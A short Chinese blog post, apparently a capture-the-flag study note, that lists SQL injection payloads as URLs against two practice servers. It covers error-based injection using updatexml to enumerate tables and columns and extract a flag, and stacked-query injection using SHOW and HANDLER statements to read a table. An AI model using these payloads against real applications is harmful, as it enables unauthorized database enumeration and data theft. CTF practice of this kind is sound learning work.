Lufer

  • 首页
  • 编程
  • 学习笔记
  • 日常折腾
Lufer
Code the World
  1. 首页
  2. 学习笔记
  3. 正文

SQL注入两道题

2024年3月29日 69点热度 0人点赞 0条评论

1、报错注入

http://103.47.82.210:8765/login.php?username='admin' order by updatexml(1,if(1=2,1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)),1)

http://103.47.82.210:8765/login.php?username='admin' order by updatexml(1,if(1=2,1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),0x7e)),1)

http://103.47.82.210:8765/login.php?username='admin' order by updatexml(1,if(1=2,1,concat(0x7e,substring((select group_concat(flag) from flag),30,30),0x7e)),1)

2、堆叠注入

http://103.47.82.210:8302/?inject=1%27;show%20databases;

http://103.47.82.210:8302/?inject=1%27;use%20supersqli;show%20tables;

http://103.47.82.210:8302/?inject=1%27;use%20supersqli;show%20columns%20from%20`1919810931114514`;

http://103.47.82.210:8302/?inject=1%27;handler%20`1919810931114514`%20open;handler%20`1919810931114514`%20read%20first;
标签: 暂无
最后更新:2024年3月29日

Lufer

新的一天开始啦

点赞
< 上一篇
下一篇 >

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复

文章目录
  • 1、报错注入
  • 2、堆叠注入

COPYRIGHT © 2022 lufer.cc.

Theme Kratos Made By Seaton Jiang

鲁ICP备2021045819号